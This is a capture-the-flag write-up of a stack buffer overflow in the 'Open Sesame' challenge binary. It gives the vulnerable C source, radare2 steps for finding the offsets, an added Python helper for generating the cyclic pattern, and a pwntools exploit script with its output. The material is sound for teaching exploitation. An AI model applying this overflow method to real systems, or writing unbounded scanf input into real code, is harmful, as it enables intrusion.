# Open Sesame (NahamCon 2023, Binary Exploitation)

The relevant part of the challenge source:

```c
#define SECRET_PASS "OpenSesame!!!"

Bool isPasswordCorrect(char *input)
{
    /* Only the first strlen(SECRET_PASS) bytes of input are compared,
       so anything appended after the password still passes the check. */
    return (strncmp(input, SECRET_PASS, strlen(SECRET_PASS)) == 0) ? yes : no;
}

void caveOfGold()
{
    Bool caveCanOpen = no;
    char inputPass[256];

    puts("BEHOLD THE CAVE OF GOLD\n");

    puts("What is the magic enchantment that opens the mouth of the cave?");
    flushBuffers();

    /* scanf("%s") has no length limit: input longer than 255 bytes
       runs past inputPass and overwrites the saved rbp and the return address. */
    scanf("%s", inputPass);
```

The binary is vulnerable to a stack-based buffer overflow. It is a 64-bit ELF executable with NX enabled, as radare2's `i` command shows:

```
> i~nx,pie,endian,rel
endian   little
nx       true
relocs   true
relro    partial
```

We can generate a cyclic pattern with `ragg2 -P 300 -r` and feed it to the program to trigger a segmentation fault:

```
> dc
BEHOLD THE CAVE OF GOLD

What is the magic enchantment that opens the mouth of the cave?
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABXABYABZABaABbABcABdABeABfABgABhABiABjABkABlABmAB
ERROR, INCORRECT PASSWORD!
[+] SIGNAL 11 errno=0 addr=0x00000000 code=128 si_pid=0 ret=0
```

Running ``wopO `dr rbp` `` gives the offset in the pattern at which the saved base pointer was overwritten:

```
> wopO `dr rbp`
272
```

We know that OpenSesame!!! is the password, so subtracting its length (13) from the RBP offset (272) gives 259: we need 259 bytes of padding after supplying the password (`b'OpenSesame!!!' + b"A"*259`).

Next, we need the offset of the data sitting at the stack pointer at the time of the crash. `pxw @ rsp` shows it, and wopO locates that dword in the pattern:

```
> pxw @ rsp
0x7fffffffde08  0x41684241 0x42416942 0x6b42416a 0x416c4241  ABhABiABjABkABlA
[...]
> wopO 0x41684241
280
```

So we need 8 more bytes after our padding to reach that position:

```
b'OpenSesame!!!' + b"A"*259 + b"B"*8
```

Let's make our exploit script:
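The pattern and offset steps above, as an added Python example (not code from the writeup, radare2 or pwntools): it builds the same kind of De Bruijn pattern that `ragg2 -P` emits, recovers the offset of a crash value the way `wopO` does, and turns the two offsets into the padding sizes used above. Assumptions: the alphabet and 3-character subsequence length are taken from radare2's debruijn.c, the register values are the ones shown on this page, and the function names are mine.

```python
# ragg2 -P output is a De Bruijn sequence over this alphabet with
# 3-character subsequences (assumption: taken from radare2's debruijn.c).
CHARSET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890"
PASSWORD = "OpenSesame!!!"          # SECRET_PASS from the challenge source


def de_bruijn(length, alphabet=CHARSET, n=3):
    """First `length` characters of the De Bruijn sequence B(k, n), built
    with the standard FKM recursion; every n-gram occurs at most once."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t, p):
        if len(out) >= length:          # stop once enough has been produced
            return
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in out[:length])


def pattern_offset(pattern, value, width=4):
    """Offset of a little-endian register/stack value inside `pattern`
    (what `wopO` does); -1 if the bytes are not part of the pattern."""
    needle = value.to_bytes(width, "little").decode("ascii", "replace")
    return pattern.find(needle)


def payload_layout(rbp_offset, ret_offset):
    """Turn the two offsets into the padding sizes the writeup uses."""
    padding = rbp_offset - len(PASSWORD)   # 272 - 13 = 259
    extra = ret_offset - rbp_offset        # 280 - 272 = 8
    return {"padding": padding, "extra": extra,
            "total": len(PASSWORD) + padding + extra}


if __name__ == "__main__":
    pat = de_bruijn(300)                        # same as `ragg2 -P 300 -r`
    ret_off = pattern_offset(pat, 0x41684241)   # dword `pxw @ rsp` showed
    print(pat[:40], ret_off, payload_layout(272, ret_off))   # 272 came from wopO `dr rbp`
```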

```python
#!/usr/bin/env python3
# Equivalent one-liner: print("OpenSesame!!!" + "A"*259 + "B"*8)

from pwn import *

# Layout derived above: password (13 bytes) + 259 bytes of padding reach
# the saved rbp at offset 272; 8 more bytes reach offset 280.
payload = b"OpenSesame!!!"
payload += b"A"*259
payload += b"B"*8

p = process("./open_sesame")

p.clean()            # discard the banner and the prompt
p.sendline(payload)
log.info(p.clean())  # print whatever the program answers
```

```bash
python3 exploit.py
[+] Starting local process './open_sesame': pid 10635
/home/lavender/.local/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] YOU HAVE PROVEN YOURSELF WORTHY HERE IS THE GOLD:
[*] Stopped process './open_sesame' (pid 10635)
```

You can create a local flag file to test this.
